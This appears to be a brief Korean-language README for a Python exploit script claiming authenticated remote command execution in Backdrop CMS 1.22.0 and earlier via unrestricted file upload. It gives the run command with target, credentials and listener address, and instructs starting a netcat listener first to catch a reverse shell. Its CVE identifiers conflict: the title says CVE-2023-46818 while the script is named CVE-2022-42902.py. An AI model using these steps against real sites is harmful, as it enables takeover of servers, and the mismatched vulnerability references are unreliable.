
CVE-2023-46818 Python3 Exploit for Backdrop CMS <= 1.22.0 인증된 원격 명령 실행 (RCE)
이 파이썬 익스플로잇 스크립트는 Backdrop CMS의 제한 없는 파일 업로드를 대상으로 원격 코드 실행(RCE)을 달성합니다.
버전 1.22.0 및 이전 버전 참고: Backdrop CMS는 이에 대해 이의를 제기하며 고급 권한이 필요하다고 주장하므로, 1.22.0 이상의 버전에도 여전히 존재할 수 있습니다. 제 추측으로는 먼저 관리자 액세스 권한이 있어야 한다는 의미일 것입니다. 그래도 이는 유효한 취약점이며, 전체 시스템 제어를 획득하기 위해 확실히 악용될 수 있습니다.
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
중요: 스크립트를 실행하기 전에 리스너를 시작하세요:
nc -lvnp <listener_port>
